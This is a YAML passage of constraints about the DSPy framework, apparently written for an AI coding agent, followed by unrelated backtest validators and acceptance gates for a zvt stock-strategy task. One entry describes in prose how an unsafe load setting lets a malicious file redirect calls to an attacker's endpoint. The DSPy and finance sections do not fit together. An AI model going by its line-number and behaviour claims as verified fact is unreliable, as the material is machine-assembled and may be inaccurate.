    derived_from_bd_id: BD-G01
  - id: dspy-C-007
    when: When building a teleprompter run on a user-supplied valset, especially when the same dataset feeds both trainset
      and valset construction
    action: assume DSPy detects train/val overlap automatically — MIPROv2 auto-splits trainset into trainset[:cutoff] + valset
      but no teleprompter checks for overlap when valset is supplied separately
    severity: fatal
    kind: claim_boundary
    modality: must_not
    consequence: Bootstrap with overlapping train/val data inflates devset scores during MIPROv2 search; the optimizer picks
      a 'best' candidate that doesn't generalize because it scored against examples it trained on. Symptom is 'great in optimization,
      bad in production' — hard to debug without explicit leakage check
    stage_ids:
    - optimizer_teleprompter
    derived_from_bd_id: BD-G02
  - id: dspy-C-021
    when: When constructing dspy.LM(model_name, ...) for OpenAI reasoning models (o-series like o1/o3/o4 and gpt-5 non-chat
      variants)
    action: pass temperature=1.0 (or None) AND max_tokens >= 16000 (or None) — the regex at lm.py:94 enforces these via raise
      ValueError, matching ^(?:o[1345](?:-(?:mini|nano|pro))?(?:-\d{4}-\d{2}-\d{2})?|gpt-5(?!-chat)(?:-.*)?)$
    severity: fatal
    kind: domain_rule
    modality: must
    consequence: OpenAI's API contract for o1/o3/o4/o5/gpt-5 reasoning models hard-requires temperature=1.0 and max_tokens
      >= 16000; passing other values raises ValueError at LM construction time, breaking any program that tries to use these
      models with default Predict settings
    stage_ids:
    - lm_client
    derived_from_bd_id: BD-008
  - id: dspy-C-034
    when: When loading a saved Predict program (Predict.load_state) from a third-party source
    action: set allow_unsafe_lm_state=True without verifying the file's provenance — UNSAFE_LM_STATE_KEYS={api_base, base_url,
      model_list} are stripped by default; allow_unsafe_lm_state=True restores them, allowing a malicious file to redirect
      calls to an attacker-controlled endpoint
    severity: fatal
    kind: domain_rule
    modality: must_not
    consequence: A malicious saved JSON could redirect calls to an attacker-controlled endpoint; predict.py:22-40 (UNSAFE_LM_STATE_KEYS)
      and :92-116 (load_state) gate this by default but allow_unsafe_lm_state=True opens the door — attacker can exfiltrate
      prompts and inject arbitrary completions
    stage_ids:
    - module_composition
    derived_from_bd_id: BD-012
  - id: dspy-C-043
    when: When deploying a dspy.ReAct or dspy program based on the yahoo_finance_react tutorial in regulated investment-advisory
      contexts (RIA, robo-advisor, retail-facing market-data app)
    action: claim the program provides investment advice — the sample tutorial does NOT implement a non-investment-advice
      disclaimer; the underlying LiteLLM-backed LM has no licensure or fiduciary status, and yfinance + langchain news are
      user-grade data not regulator-grade
    severity: fatal
    kind: claim_boundary
    modality: must_not
    consequence: Holding out an LLM-driven response as investment advice exposes the operator to SEC/FINRA/NFA registration
      requirements and fiduciary liability; the tutorial is illustrative-only and the user must add disclaimers, age-gating,
      and regulatory review before serving
    stage_ids:
    - module_composition
  - id: dspy-C-044
    when: When configuring MIPROv2 for any cost-sensitive run (paid LM provider, fixed compute budget, business unit chargeback)
    action: assume DSPy enforces a max_total_calls budget — there is NO max_total_calls knob anywhere; _estimate_lm_calls
      only PRINTS estimates as ANSI strings without raising on overage
    severity: fatal
    kind: claim_boundary
    modality: must_not
    consequence: Operators expecting framework-level cost gating get none; deciding to run auto='heavy' on a large valset
      assumes a budget cap that does not exist — the only protection is the operator's pre-launch arithmetic, and the bill
      arrives only after silent runaway
    stage_ids:
    - optimizer_teleprompter
    derived_from_bd_id: BD-G01
  regular:
  - id: dspy-C-004
    when: When defining a metric callable for BootstrapFewShot / MIPROv2 / GEPA (any teleprompter that bootstraps demos)
    action: 'either (a) explicitly branch on `if trace is None: return scalar; else: return strict bool`, OR (b) set metric_threshold
      to a meaningful floor when constructing the teleprompter — default metric_threshold=None makes any truthy scalar (including
      0.51) succeed in bootstrap mode'
    severity: high
    kind: domain_rule
    modality: must
    consequence: bootstrap.py:205-212 evaluates `success = bool(metric_val)` when metric_threshold is None (default at bootstrap.py:40),
      so partial-credit scalars like 0.51 enter the demo pool as positives → optimized program degrades on dev because demos
      contain low-quality examples treated as gold
    stage_ids:
    - optimizer_teleprompter
    derived_from_bd_id: BD-016
  - id: dspy-C-005
    when: When deploying ChatAdapter (the silent default) to production / staging / regulated workflows where output format
      matters
    action: construct adapter as dspy.ChatAdapter(use_json_adapter_fallback=False) OR install a callback that logs adapter
      switch via inspect_history — the silent fallback to JSONAdapter on parse failure is unobservable in trace/history
    severity: high
    kind: operational_lesson
    modality: should
    consequence: chat_adapter.py:71-86 catches any Exception (except ContextWindowExceededError / already-JSON / use_json_adapter_fallback=False)
      and silently retries with JSONAdapter() with no INFO/WARNING log line — debugging 'why is my output suddenly JSON?'
      wastes hours because telemetry shows JSONAdapter calls but no breadcrumb of the fallback
    stage_ids:
    - adapter_layer
    derived_from_bd_id: BD-006
  - id: dspy-C-006
    when: When writing a custom optimizer that copies an LM with rollout_id to bypass cache between rounds
    action: pair lm.copy(rollout_id=...) with temperature > 0 in the same call — rollout_id is documented as a no-op when
      temperature=0 (lm.py:67-72 docstring) and _warn_zero_temp_rollout fires only ONCE per LM instance via the _warned_zero_temp_rollout
      flag
    severity: medium
    kind: domain_rule
    modality: must
    consequence: Custom optimizer code that copies an LM with rollout_id but forgets to bump temperature gets identical cached
      completions every 'round' → silent zero-effect bootstrap; the user's optimization run produces no diversity but appears
      to execute normally because the warning fires only once per LM instance
    stage_ids:
    - lm_client
    derived_from_bd_id: BD-002
  - id: dspy-C-008
    when: When preparing trainset and valset for any teleprompter that uses both
    action: compute set(example.inputs hashes) intersection between trainset and valset BEFORE calling compile(); abort or
      split if overlap > 0; persist a leakage report alongside the optimized program
    severity: high
    kind: domain_rule
    modality: must
    consequence: Without an explicit overlap check, optimizer rankings are inflated and the chosen prompt is the one most
      overfit to the leaked examples; production performance drops well below the optimizer-reported metric — the only visible
      symptom is silently wrong production scores
    stage_ids:
    - optimizer_teleprompter
    derived_from_bd_id: BD-G02
  - id: dspy-C-009
    when: When running BootstrapFewShot on small trainsets (~10 examples) without configuring metric_threshold or a held-out
      validation gate
    action: assume BootstrapFewShot detects demo overfit — there is no held-out gate inside _bootstrap_one_example; the loop
      accepts any truthy metric per dspy-C-004
    severity: high
    kind: claim_boundary
    modality: must_not
    consequence: With small trainsets it is easy to bootstrap 4 demos that match exactly the trainset's quirks; the optimized
      program looks great on the trainset but tanks on dev. Easy to mistake for 'the LM can't do this task' when the real
      cause is overfit demos
    stage_ids:
    - optimizer_teleprompter
    derived_from_bd_id: BD-G03
  - id: dspy-C-010
    when: When calling BootstrapFewShot on any trainset under ~50 examples
    action: split a held-out devset (≥20% of trainset OR ≥10 examples, whichever larger) BEFORE compile(); evaluate the optimized
      program against that devset and abort promotion if delta vs baseline < 5% absolute or worse than baseline
    severity: high
    kind: operational_lesson
    modality: must
    consequence: Without held-out gating, the optimizer's 'best' demo set may regress on unseen data; small-trainset overfit
      silently turns into production-quality regression that only surfaces in user-facing metrics
    stage_ids:
    - optimizer_teleprompter
    derived_from_bd_id: BD-G03
  - id: dspy-C-011
    when: When ChatAdapter is in use and parse-failure observability is required for telemetry / debugging
    action: assume DSPy emits a logger.warning before retrying with JSONAdapter — the silent retry path at chat_adapter.py:71-86
      has NO log call before invoking JSONAdapter()(...)
    severity: high
    kind: claim_boundary
    modality: must_not
    consequence: Production traffic that quietly switches format from chat to JSON appears in usage_tracker as JSONAdapter
      calls with no breadcrumb explaining the switch; debugging 'why does my downstream parser see JSON?' requires reading
      source
    stage_ids:
    - adapter_layer
    derived_from_bd_id: BD-G04
  - id: dspy-C-012
    when: When building a custom Adapter or wrapping ChatAdapter for production deployment
    action: register a BaseCallback (dspy/utils/callback.py) that logs adapter class name on on_adapter_format_start and detects
      ChatAdapter→JSONAdapter switch via inspect_history; OR pass use_json_adapter_fallback=False at adapter construction
    severity: medium
    kind: operational_lesson
    modality: must
    consequence: 'Without explicit observability, silent adapter switches break invariants in downstream parsers (e.g., regex
      expecting [[ ## field ## ]] markers no longer matches JSON output) and produce hard-to-attribute failures'
    stage_ids:
    - adapter_layer
    derived_from_bd_id: BD-G04
  - id: dspy-C-013
    when: When upgrading the model string in a saved DSPy program (e.g. switching from openai/gpt-4o-mini-2024-07-18 to openai/gpt-5)
    action: assume DSPy verifies signature/format compatibility on the new model — the cache key includes model (cache.py:104-113)
      but no schema-compatibility check exists; the reasoning-model regex at lm.py:94 is the only guardrail and only enforces
      temperature/max_tokens
    severity: high
    kind: claim_boundary
    modality: must_not
    consequence: A program optimized against gpt-4o-mini-2024-07-18 may produce malformed output when the user upgrades to
      gpt-5 — stale prompts get re-applied because the only signal is a cache miss, and the new model may parse the same instructions
      differently
    stage_ids:
    - lm_client
    derived_from_bd_id: BD-G05
  - id: dspy-C-014
    when: When changing the model string of a previously-optimized program
    action: re-evaluate the optimized program against a held-out devset on the NEW model BEFORE serving traffic; if metric
      drops by ≥3% absolute, re-run the optimizer with the new model in the loop; persist the (model, optimizer_run_id) tuple
      in the program metadata
    severity: high
    kind: operational_lesson
    modality: must
    consequence: Without re-evaluation, model upgrades introduce silent format drift; users see degraded answers without knowing
      the cache key change masked an underlying behavioral shift
    stage_ids:
    - lm_client
    derived_from_bd_id: BD-G05
  - id: dspy-C-015
    when: When seeking reproducibility for an A/B comparison of optimizers (e.g. MIPROv2 vs BootstrapFewShot at the same seed)
    action: assume MIPROv2(seed=...) yields bit-for-bit reproducible runs — MIPROv2 sets random.Random(seed) and np.random.seed(seed)
      but does NOT seed torch, does NOT seed LiteLLM provider's stochastic retries, and lm.copy(rollout_id=…) only changes
      a cache key not the upstream LM's RNG
    severity: medium
    kind: claim_boundary
    modality: must_not
    consequence: Re-running the same seed against a hosted LM produces different optimized programs because upstream LM RNG
      is uncontrolled; A/B comparisons of MIPROv2 vs BootstrapFewShot on same seed are not strict — different upstream LM
      RNG produces different candidate sets
    stage_ids:
    - optimizer_teleprompter
    derived_from_bd_id: BD-G06
  - id: dspy-C-016
    when: When publishing optimizer A/B results (e.g. comparing MIPROv2 to BootstrapFewShot on a benchmark)
    action: run each comparison ≥3 times with different seeds, report mean ± std, and freeze the LM provider snapshot (model
      + endpoint + date) in the report; do not claim 'X beats Y' from a single seeded run
    severity: medium
    kind: operational_lesson
    modality: must
    consequence: Single-seed comparisons in DSPy are not reproducible across runs because upstream LM RNG is uncontrolled;
      reporting them as point estimates misleads readers about optimizer effectiveness
    stage_ids:
    - optimizer_teleprompter
    derived_from_bd_id: BD-G06
  - id: dspy-C-017
    when: When measuring per-stage LM cost in a multi-LM program (e.g. MIPROv2 with prompt_model + task_model)
    action: assume track_usage produces a per-stage breakdown — track_usage aggregates per LM ID; programs that share the
      SAME LM across optimizer-stage and program-execution-stage see a flat sum without stage attribution
    severity: medium
    kind: claim_boundary
    modality: must_not
    consequence: Cost analysis of multi-LM programs requires manual instrumentation; users who attempt to attribute cost to
      optimizer-stage vs program-stage from track_usage alone will mis-allocate budget — debugging 'why did my optimization
      cost twice the program cost' requires manual inspection of predictor.lm
    stage_ids:
    - cache_and_trace
    derived_from_bd_id: BD-G07
  - id: dspy-C-018
    when: When running a multi-LM program (prompt_model + task_model) and needing per-stage cost attribution
    action: wrap optimizer.compile() and program(...) call sites in separate dspy.context(track_usage=True) blocks and record
      the resulting tracker snapshots before/after each block; OR assign distinct LM instances per stage and aggregate by
      predictor.lm
    severity: medium
    kind: operational_lesson
    modality: must
    consequence: Without explicit per-stage instrumentation, you cannot tell which LM call cost belongs to which workflow
      phase; cost-tuning decisions become guesswork
    stage_ids:
    - cache_and_trace
    derived_from_bd_id: BD-G07
  - id: dspy-C-019
    when: When dispatching DSPy work between asyncio loops via asyncio.run_coroutine_threadsafe (e.g., gateway thread pool
      feeding a worker loop)
    action: assume dspy.context(...) overrides propagate across asyncio.run_coroutine_threadsafe to a different loop — settings.thread_local_overrides
      is a ContextVar that propagates across `await` but NOT across cross-loop dispatch
    severity: medium
    kind: claim_boundary
    modality: must_not
    consequence: Multi-loop apps that use dspy.context(lm=…, trace=[]) for per-call overrides may see those overrides silently
      dropped when work is dispatched to a different loop, falling back to global Settings — calls run with wrong LM / no
      trace and the symptom is 'why did my override do nothing'
    derived_from_bd_id: BD-G08
  - id: dspy-C-020
    when: When designing a multi-loop service (gateway loop + worker loop) that uses DSPy
    action: read settings.thread_local_overrides in the source loop and re-apply it via dspy.context(**overrides) in the destination
      loop's coroutine BEFORE invoking any DSPy module; OR confine all DSPy calls to a single asyncio loop
    severity: medium
    kind: operational_lesson
    modality: must
    consequence: Without explicit forwarding, cross-loop dispatch loses dspy.context state silently, leading to wrong LM selection
      / lost trace data — particularly painful for telemetry pipelines that rely on trace=[] being non-None inside the optimizer
    derived_from_bd_id: BD-G08
  - id: dspy-C-022
    when: When tuning MIPROv2's num_trials based on num_candidates and num_predictors
    action: use the documented trial-budget formula int(max(2 * num_vars * np.log2(num_candidates), 1.5 * num_candidates))
      where num_vars = num_predictors * 2 (or × 1 for zero-shot); do not substitute grid-search style num_trials = num_candidates
      × num_predictors
    severity: high
    kind: domain_rule
    modality: must
    consequence: Replacing the Bayesian-scaled formula with grid search inflates cost from O(M log N) to O(M × N²); a 10-predictor
      × 18-candidate run grows from ~140 trials to ~3240 trials, multiplying LM cost by ~23x
    stage_ids:
    - optimizer_teleprompter
    derived_from_bd_id: BD-004
  - id: dspy-C-023
    when: When configuring ParallelExecutor for slow LM providers or genuinely long contexts (e.g. local vLLM with 32k context)
    action: raise the timeout constructor argument above the default 120 seconds — straggler resubmission triggers when ≤
      straggler_limit=3 items remain AND one has run > timeout=120s, which on slow models causes runaway duplicate cost; tune
      both `timeout` and `straggler_limit` for the concurrency profile
    severity: high
    kind: architecture_guardrail
    modality: must
    consequence: Default timeout=120s with straggler_limit=3 was tuned for hosted OpenAI latency. Local model deployments
      with multi-second-per-token latency will resubmit healthy long-context requests and double-bill — for n straggler items
      with iid hazard, expected duplicate count ≈ straggler_limit
    stage_ids:
    - cache_and_trace
    derived_from_bd_id: BD-014
  - id: dspy-C-024
    when: When BootstrapFewShot users need bigger demo sets for long-tail / rare-class coverage
    action: validate whether the defaults max_bootstrapped_demos=4 + max_labeled_demos=16 + max_rounds=1 fit the task — long-tail
      tasks need both raised; long-context models tolerate larger demo sets without context exhaustion
    severity: medium
    kind: operational_lesson
    modality: should
    consequence: Default 4+16 demos were chosen to bound prompt growth and LM cost; tasks with rare-event coverage (long-tail
      classes, multi-modal reasoning) bootstrap insufficient diverse demos and the optimized program misses minority-class
      behavior
    stage_ids:
    - optimizer_teleprompter
    derived_from_bd_id: BD-001
  - id: dspy-C-025
    when: When using MIPROv2 auto={light,medium,heavy} mode on devsets with high-variance metrics (long-tail labels, noisy
      ground-truth)
    action: disable auto-mode and pass full valset explicitly via valset=…, num_trials=…; auto-mode silently truncates valset
      to 100/300/1000 via create_minibatch — high-variance metrics need the full distribution to rank candidates reliably
    severity: medium
    kind: operational_lesson
    modality: should
    consequence: AUTO_RUN_SETTINGS = {light:{n:6,val_size:100}, medium:{n:12,val_size:300}, heavy:{n:18,val_size:1000}} truncates
      valset (mipro_optimizer_v2.py:308). Ranking on a noisy 100-example minibatch picks 'lucky' candidates whose advantage
      disappears on the full devset
    stage_ids:
    - optimizer_teleprompter
    derived_from_bd_id: BD-003
  - id: dspy-C-026
    when: When constructing dspy.Predict with n>1 and explicitly desiring deterministic / low-temperature self-consistency
      over identical-input calls
    action: be aware that Predict silently overrides config['temperature']=0.7 when n>1 and (temperature is None or temperature
      <= 0.15); to keep your low temperature, explicitly set temperature=0.16 or higher, OR call the LM directly bypassing
      Predict's temperature mutation
    severity: medium
    kind: operational_lesson
    modality: should
    consequence: predict.py:164-169 forces temperature=0.7 when n>1 and temp <= 0.15. Users running n=5 self-consistency at
      temperature=0.0 expect 5 deterministic samples but actually get 5 high-diversity samples — completely changing the assumed
      sampling distribution silently
    stage_ids:
    - module_composition
    derived_from_bd_id: BD-007
  - id: dspy-C-027
    when: When deploying DSPy on AWS Lambda / serverless / ephemeral containers
    action: be aware default disk cache 30 GB at ~/.dspy_cache is global-instance only; on disk-init failure DSPY_CACHE silently
      falls back to memory-only (clients/__init__.py:75-85). Plan for cold-start cache loss; either set DSPY_CACHEDIR to a
      writable persistent volume OR accept memory-only behavior
    severity: medium
    kind: resource_boundary
    modality: should
    consequence: Cold-start cache loss on serverless triggers full LM re-execution every cold start; users expecting ~/.dspy_cache
      speedup see fluctuating cost and latency without understanding the fallback path took effect silently
    stage_ids:
    - cache_and_trace
    derived_from_bd_id: BD-010
  - id: dspy-C-028
    when: When constructing user-instantiated Cache(...) directly instead of using the global DSPY_CACHE
    action: explicitly pass disk_size_limit_bytes — the Cache constructor default is 1024*1024*10 = ~10 MB, NOT 30 GB; only
      the global DSPY_CACHE built via _get_dspy_cache() reads DSPY_CACHE_LIMIT (default 3e10 = 30 GB)
    severity: high
    kind: resource_boundary
    modality: must
    consequence: Users who instantiate Cache(...) expecting 30 GB based on documentation get 10 MB instead; cache evicts after
      the first ~100 LM responses, defeating the optimizer's caching strategy entirely
    stage_ids:
    - cache_and_trace
    derived_from_bd_id: BD-010
  - id: dspy-C-029
    when: When initializing DSPy in a multi-threaded or multi-async-task application
    action: call dspy.configure(lm=…) exactly once from the main thread / first async task at startup; in other threads /
      async tasks use dspy.context(...) instead of configure() — _ensure_configure_allowed raises RuntimeError on second-thread
      / cross-task configure
    severity: high
    kind: architecture_guardrail
    modality: must
    consequence: settings.py:117-163 raises 'dspy.settings can only be changed by the thread that initially configured it'
      on second-thread configure(), and 'dspy.configure(...) can only be called from the same async task that called it first'
      on cross-task configure() — services that re-configure per request crash on the second request
  - id: dspy-C-030
    when: When mutating a Signature class (with_instructions / prepend / append / delete / insert / with_updated_fields) and
      capturing the result for subsequent use
    action: assign the return value to a new variable (or override the original) — every Signature mutator returns a NEW Signature
      class without modifying the original; relying on in-place mutation silently loses the change
    severity: high
    kind: architecture_guardrail
    modality: must
    consequence: Signature is immutable per design (signature.py:271-499). Code like `Sig.with_instructions('...')` without
      assignment is a no-op; the user expects the original Sig to carry the new instructions but it does not, leading to prompts
      that reference fields/instructions not actually present
    stage_ids:
    - signature_definition
  - id: dspy-C-031
    when: When declaring a class-form Signature with InputField / OutputField fields
    action: annotate every field with a concrete type (str / int / Literal[...] / pydantic models, etc.) — un-annotated fields
      like `text = InputField()` silently get str injected and IS_TYPE_UNDEFINED=True, so Predict._forward_preprocess SKIPS
      type validation and typos like `qustion = InputField()` slip through
    severity: high
    kind: domain_rule
    modality: must
    consequence: signature.py:164-173 injects str when no annotation is present; predict.py:198-214 honours IS_TYPE_UNDEFINED
      to skip validation. Typo'd field names slip through with str type, and the failure surfaces only at LM call time with
      a confusing error rather than at module construction
    stage_ids:
    - signature_definition
  - id: dspy-C-032
    when: When subclassing dspy.Module to compose Predicts into a higher-level pipeline
    action: override forward(); rely on Module.named_predictors() / .predictors() to traverse the parameter tree — these recursive
      walkers are the foundation of optimizer parameter discovery (every teleprompter calls them to find Predicts)
    severity: high
    kind: architecture_guardrail
    modality: must
    consequence: Modules that hide Predict instances behind methods (rather than as attributes on self or in nested Modules)
      are invisible to named_predictors → optimizers cannot find them → optimization silently misses those Predicts and the
      user sees an unoptimized program reported as optimized
    stage_ids:
    - module_composition
  - id: dspy-C-033
    when: When subclassing dspy.adapters.Adapter to build a custom adapter (e.g. for a new format like protobuf)
    action: override exactly four methods that raise NotImplementedError in the base — format_field_description, format_field_structure,
      format_task_description, parse — Adapter is a plain class, NOT abc.ABC, so missing overrides instantiate fine but blow
      up at first call
    severity: high
    kind: architecture_guardrail
    modality: must
    consequence: base.py:21 declares Adapter as a plain class; lines 323/335/349/535 raise NotImplementedError. Subclasses
      that miss any of the four overrides instantiate without error and only fail when the missing method is invoked, which
      can be deep inside a teleprompter run
    stage_ids:
    - adapter_layer
  - id: dspy-C-035
    when: When importing or installing a downstream package alongside dspy that itself wraps litellm and may want its own
      cache
    action: 'rely on litellm.cache being non-None inside DSPy code paths — DSPy hard-disables it at import time (clients/__init__.py:59-60:
      litellm.cache = None and litellm.telemetry = False); a downstream package that re-enables litellm.cache after dspy import
      will create double-caching and undefined invalidation semantics'
    severity: high
    kind: architecture_guardrail
    modality: must_not
    consequence: DSPy owns key generation via deterministic SHA-256 over normalized request; if a downstream package re-enables
      litellm.cache, both caches operate on the same keys with different policies, leading to inconsistent hits/misses and
      stale-data risk
    derived_from_bd_id: BD-009
  - id: dspy-C-036
    when: When iterating on a pydantic model used as an input/output field type without changing its schema (e.g. tweaking
      a default value)
    action: assume the cache key changes — _transform_value (cache.py:24-37) reduces pydantic models to model_json_schema()
      and callables to inspect.getsource(); changing only an instance default while preserving the schema produces CACHE HIT
      ON STALE DATA
    severity: high
    kind: domain_rule
    modality: must_not
    consequence: Cache.put recorded responses keyed by the schema; subsequent calls with a 'changed' but schema-equivalent
      input get the stale cached response instead of fresh LM output. Symptom is silently wrong outputs that match the OLD
      model defaults
    stage_ids:
    - cache_and_trace
  - id: dspy-C-037
    when: When using BootstrapFinetune to distill a prompt-engineered program into a finetuned smaller model
    action: call module.set_lm(lm) on every predictor BEFORE compile() — bootstrap_finetune.py:82-87 raises ValueError 'Predictor
      X does not have an LM assigned' if any predictor lacks a set LM; the fix message points to module.set_lm(lm)
    severity: high
    kind: domain_rule
    modality: must
    consequence: BootstrapFinetune groups by (predictor.lm, pred_ind) so that multi-LM programs train each LM separately;
      a predictor without lm cannot be grouped and the run aborts at compile() — the user must understand the requirement
      BEFORE launching the finetune workflow
    stage_ids:
    - optimizer_teleprompter
  - id: dspy-C-038
    when: When relying on dspy.ReAct for a tool-using agent with default max_iters=20
    action: size the ReAct max_iters and tool budget against expected trajectory depth; the trajectory truncation retry loop
      lives at react.py:145-167 (NOT 100-107) and triggers on context-window overflow during the final extract step
    severity: medium
    kind: operational_lesson
    modality: must
    consequence: ReAct's default max_iters=20 may consume large LM call budgets per query; without cost-bounded tool execution,
      a single ReAct call can blow through cost budgets in pathological multi-tool loops
    stage_ids:
    - module_composition
  - id: dspy-C-039
    when: 'When using string-form Signatures with custom (non-stdlib) types referenced by name (e.g. ''context: MyDoc -> answer'')'
    action: assume DSPy resolves custom types reliably across modules — _detect_custom_types_from_caller (signature.py:53-136)
      walks UP TO 100 stack frames scanning f_locals/f_globals; the module docstring acknowledges 'May not work in all Python
      implementations…cannot find types that are imported but not in the caller's namespace'; failure logs a warning and proceeds
      with unresolved types
    severity: medium
    kind: claim_boundary
    modality: should_not
    consequence: Frame-introspection custom-type resolution is brittle across Python implementations and module boundaries;
      failures surface as silent type-erased fields that fail only at LM call time with confusing errors instead of explicit
      type-not-found at signature construction
    stage_ids:
    - signature_definition
  - id: dspy-C-040
    when: When subclassing dspy.clients.Provider for a new finetunable LM provider
    action: 'implement all five @abstractmethod points: TrainingJob.status (provider.py:67), ReinforceJob.initialize (:112),
      ReinforceJob.step (:121), ReinforceJob.terminate (:135), ReinforceJob.save_checkpoint (:144) — these are the ONLY @abstractmethods
      (other than Proposer.propose_instructions_for_program); Provider itself does NOT use @abstractmethod and provides empty
      defaults for launch/kill'
    severity: high
    kind: architecture_guardrail
    modality: must
    consequence: Subclasses missing @abstractmethod overrides cannot instantiate (TypeError) — but custom Provider base implementations
      that bypass the abstract Job classes silently break BootstrapFinetune workflows because the lifecycle methods are never
      called
    stage_ids:
    - lm_client
  - id: dspy-C-041
    when: When switching api_base / base_url for the SAME model name (e.g. round-robin between two OpenAI-compatible endpoints)
    action: assume cache invalidates on endpoint change — ignored_args_for_cache_key includes api_key/api_base/base_url (lm.py:148);
      same model + different endpoint = CACHE HIT
    severity: high
    kind: domain_rule
    modality: must_not
    consequence: Multi-endpoint deployments that switch api_base for the SAME model name silently get cached responses from
      the previous endpoint; if endpoints serve different fine-tuned weights of the same base model, output is silently wrong
    stage_ids:
    - lm_client
    derived_from_bd_id: BD-009
  - id: dspy-C-042
    when: When integrating dspy.ReAct with langchain Tools or yfinance-style tools (e.g. UC-008 Yahoo Finance ReAct)
    action: validate tool inputs against the Tool schema BEFORE invoking the underlying API and handle empty-data responses
      (e.g. yfinance returns empty DataFrame for invalid tickers) — DSPy delegates input validation to Tool.from_langchain
      wrapper but does not catch downstream empty data
    severity: high
    kind: operational_lesson
    modality: must
    consequence: Empty data returned from a tool may not raise; ReAct continues the trajectory with empty observation, leading
      to hallucinated downstream answers — yfinance specifically returns empty DataFrame rather than raising on invalid ticker
    stage_ids:
    - module_composition
output_validator:
  assertions:
  - id: OV-01
    check_predicate: all(p in inspect.getsource(zvt.factors.algorithm.macd) for p in ['slow=26', 'fast=12', 'n=9'])
    failure_message: 'FATAL: MACD params drifted from (fast=12, slow=26, n=9) — SL-08 violation, non-reproducible signals'
    business_meaning: Standard MACD parameters are a semantic lock; drift makes results incomparable with industry-standard
      indicators and non-reproducible.
    source_ids:
    - SL-08
    - BD-036
  - id: OV-02
    check_predicate: result.get('total_trades', 0) > 0 or result.get('explicit_zero_trade_ack') is True
    failure_message: Zero trades executed — likely missing pre-fetched data (see PC-02) or over-restrictive filters
    business_meaning: A backtest with zero trades is not a valid result; either data is missing or the strategy never triggered.
      Structural non-emptiness check is insufficient — we need business confirmation.
    source_ids:
    - SL-01
    - finance-C-073
  - id: OV-03
    check_predicate: result.get('annual_return') is None or abs(float(result['annual_return'])) <= 5.0
    failure_message: 'FATAL: |annual_return| > 500% — likely look-ahead bias or data error'
    business_meaning: Annual returns exceeding 500% are physically implausible for A-share strategies; indicates look-ahead
      bias or corrupt data.
    source_ids: []
  - id: OV-04
    check_predicate: result.get('holding_change_pct') is None or abs(float(result['holding_change_pct'])) <= 1.0
    failure_message: 'FATAL: |holding_change_pct| > 100% — physically impossible'
    business_meaning: Holding change percentage cannot exceed 100%; violation indicates position accounting error.
    source_ids:
    - BD-029
  - id: OV-05
    check_predicate: result.get('max_drawdown') is None or abs(float(result['max_drawdown'])) <= 1.0
    failure_message: 'FATAL: |max_drawdown| > 100% — impossible for non-leveraged account'
    business_meaning: Maximum drawdown cannot exceed 100% without leverage; violation indicates calculation error or look-ahead
      bias.
    source_ids: []
  - id: OV-06
    check_predicate: not (hasattr(result, 'trade_log') and result.trade_log and any(result.trade_log[i].action == 'sell' and
      i+1 < len(result.trade_log) and result.trade_log[i+1].action == 'buy' and result.trade_log[i].timestamp == result.trade_log[i+1].timestamp
      for i in range(len(result.trade_log)-1)))
    failure_message: 'FATAL: buy-before-sell detected in same cycle — SL-01 violation, creates implicit leverage'
    business_meaning: SL-01 requires sell() before buy() in each cycle; violation means available_long was not updated before
      buying, risking duplicate positions.
    source_ids:
    - SL-01
  scaffold:
    validate_py_path: '{workspace}/validate.py'
    tail_block: "# === DO NOT MODIFY BELOW THIS LINE ===\nif __name__ == \"__main__\":\n    result = run_backtest()\n    from\
      \ validate import enforce_validation\n    enforce_validation(result, output_path=\"{workspace}/result.csv\")\n# ===\
      \ END DO NOT MODIFY ==="
  enforcement_protocol: 1. Never edit validate.py. 2. Never delete the DO NOT MODIFY tail block from the main script. 3. Never
    wrap enforce_validation() in try/except. 4. Never rewrite result write logic — it MUST go through enforce_validation.
    5. If validate.py raises ImportError, fix the dependency, do not remove the call.
acceptance:
  hard_gates:
  - id: G1
    check: '{workspace}/result.csv exists AND file size > 0'
    on_fail: Strategy did not produce output; check run_backtest() return value and enforce_validation() call
  - id: G2
    check: '{workspace}/result.csv.validation_passed marker file exists'
    on_fail: Validation did not complete; review validate.py output and fix assertion failures
  - id: G3
    check: 'Main script contains literal: from validate import enforce_validation'
    on_fail: Validation chain stripped; re-add the import in the DO NOT MODIFY block
  - id: G4
    check: 'Main script contains literal: # === DO NOT MODIFY BELOW THIS LINE ==='
    on_fail: Validation fence removed; regenerate DO NOT MODIFY tail block
  - id: G5
    check: 'result.csv has at least 1 row: pandas.read_csv(result.csv).shape[0] >= 1'
    on_fail: Empty result; check if trade_log is non-empty and factors generated signals. Confirm PC-02 (k-data exists) passed.
  - id: G6
    check: 'If MACD strategy: source contains ''slow=26'' AND ''fast=12'' AND ''n=9'' in algorithm call'
    on_fail: MACD params drifted from SL-08 lock; restore standard (12, 26, 9)
  - id: G7
    check: 'For data pipeline tasks: result.csv contains ''entity_id'' and ''timestamp'' fields'
    on_fail: Missing required columns; check Mixin.query_data return schema and DataFrame MultiIndex reset_index() before
      writing
  - id: G8
    check: 'OV-03 passes: abs(annual_return) <= 5.0 (500%)'
    on_fail: Physical plausibility check failed; investigate look-ahead bias or data corruption in input kdata
  soft_gates:
  - id: SG-01
    rubric: 'Strategy narrative consistency: user intent aligns with generated strategy.py logic. dim_a: signal direction
      (buy/sell) matches intent [1-5, pass>=4]; dim_b: frequency (daily/intraday) aligns [1-5, pass>=4]; dim_c: risk controls
      match user intent [1-5, pass>=4].'
  - id: SG-02
    rubric: 'Factor combination quality. dim_a: no highly correlated factor duplication [1-5, pass>=4]; dim_b: multi-period
      alignment correct [1-5, pass>=4]; dim_c: liquidity filter present for A-share [1-5, pass>=4].'
  - id: SG-03
    rubric: 'Data source selection appropriateness. dim_a: coverage sufficient for target entities [1-5, pass>=4]; dim_b:
      provider latency acceptable for strategy frequency [1-5, pass>=4]; dim_c: no unauthorized provider used without credentials
      [1-5, pass>=4].'
skill_crystallization:
  trigger: all_hard_gates_passed AND user_opt_out_skill_saving != true
  output_path_template: '{workspace}/../skills/{slug}.skill'
  slug_template: '{blueprint_id_short}-{uc_id_lower}'
  captured_fields:
  - name
  - intent_keywords
  - entry_point_script
  - validate_script
  - fatal_constraints
  - spec_locks
  - preconditions
  - install_recipes
  - human_summary_translated
  action: 'After all Hard Gates PASS, resolve slug via slug_template using the executed UC, then write the .skill YAML file
    at output_path_template. Notify user in their detected locale: ''Skill saved as {slug}.skill — next time say one of {sample_triggers}
    from the matched UC to invoke directly.'''
  violation_signal: All hard gates passed but no .skill file exists at expected path
  skill_file_schema:
